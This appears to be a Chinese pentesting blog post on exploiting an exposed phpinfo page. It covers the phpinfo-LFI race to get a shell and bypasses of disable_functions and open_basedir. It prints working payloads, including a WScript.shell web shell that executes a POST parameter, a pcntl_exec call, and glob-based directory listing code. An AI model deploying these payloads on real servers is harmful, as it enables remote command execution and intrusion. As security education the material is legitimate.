文章插图
一.phpinfo页面利用system
文章插图
获取具体版本,可以用来提权
extension_dir
文章插图
php扩展的路径,图省事没用lamp包有点捞…(这里还是说下linux不推荐用phpstudy,很多linux装了phpstudy系统会崩)
http_x_real_ip
直接获取真实ip,无视代理、cdn 。本地环境并没有发现这个参数,应该是ini配置问题 。
顺便说下HTTP_X_FORWARDED_FOR的区别,HTTP_X_FORWARDED_FOR会记录代理过程且可伪造
二.Web根目录
文章插图
找不到路径,报错/找phpinfo常规操作了 。
临时文件
phpinfo-lfi getshell 很老的洞了,看到学习下
像phpinfo页面post数据可以在_FILES[“file1”]中看到上传的临时文件,先构造简单上传页面 。
文章插图
其中PHP引擎对enctype=”multipart/form-data”这种请求的处理过程如下:
1、请求到达2、创建临时文件,并写入上传文件的内容3、调用相应PHP脚本进行处理,如校验名称、大小等4、删除临时文件
文章插图
这里可以看到,临时文件可以成功写入,配合lfi即可getshell,不过临时文件很块就会被删除,利用分块传输竞争时间绕过
https://www.insomniasec.com/downloads/publications/phpinfolfi.py
利用脚本,不过我本地测试失败了
这里说下这个漏洞感觉还是比较鸡肋(条件有点苛刻)
1、phpinfo2、开启了文件缓存3、没有gpc等函数限制4、开启lfi,有包含点
allow_url_include文件包含有多重要自不必多说 。
asp_tags
文章插图
php标签有四种格式,这个是asp风格的,默认不开启 。可以上传.haccess/user.ini 绕过(php7移除)
disable_functions
禁用函数列表:
(dl)execsystempassthrupopenproc_openpcntl_execshell_exec
绕过方式:
1、记得Seay代码审计里说过dl()函数(需要enable_dl开启)
<?php//PHP5调用方法dl('../../../../../home/Apache/htdocs/php5.so');spiderbiguan('uname -a');//调用函数?>
2、编译php时如果加了-–enable-pcntl选项,就可以使用pcntl_exec()来执行命令 。PHP>4.2.0<?php pcntl_exec(“/bin/bash”, array(“/tmp/b4dboy.sh”));?>#/tmp/b4dboy.sh#!/bin/bashls -l /
3、利用ImageMagick漏洞绕过disable_function(应该是要组件与扩展都有具体测试)https://www.waitalone.cn/imagemagic-bypass-disable_function.html
4、利用环境变量LD_PRELOAD来绕过
http://www.vuln.cn/6784的确是一种好方法,利用起来也没有那么繁琐 。
5、win系统组件
<?php$command=$_POST[a];$wsh = new COM('WScript.shell'); // 生成一个COM对象$exec = $wsh->exec('cmd.exe /c '.$command); //调用对象方法来执行命令$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput?>
magic_quotes_gpc
魔术引号,它是用来实现addslshes()和stripslashes()这两个功能的,对SQL注入进行防御 。
顺便提一嘴用了addslshes()除非是有编码问题要不然是不存在注入的 。
open_basedir
将用户可操作的文件限制在某目录下
文章插图
绕过方式:
linux下绕过:
https://www.leavesongs.com/PHP/php-bypass-open-basedir-list-directory.html
(大佬博客我这里也复现下)
1、利用DirectoryIterator + Glob 直接列举目录(linux)
<?phpprintf('<b>open_basedir : %s </b><br />', ini_get('open_basedir'));$file_list = array();// normal files$it = new DirectoryIterator("glob:///*");foreach($it as $f) {$file_list[] = $f->__toString();}// special files (starting with a dot(.))$it = new DirectoryIterator("glob:///.*");foreach($it as $f) {$file_list[] = $f->__toString();}sort($file_list);foreach($file_list as $f){echo "{$f}<br/>";}?>
推荐阅读
- 商务舱空姐知道你的信息吗 空姐知道旅客的哪些信息
- 茶行业如何利用全流程服务体系实现品牌突围
- 利用Zabbix监控工具自动帮我们检测目标网络状况
- 江苏茶的利用溯源
- App违规收集个人信息认定标准来了!这9种行为要注意
- 漏洞验证和利用代码编写指南
- 人口普查会不会泄露个人信息 人口普查会泄露隐私吗
- Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程
- 漏洞利用复现,看看黑客如何入侵服务器
- 第五街楼盘信息介绍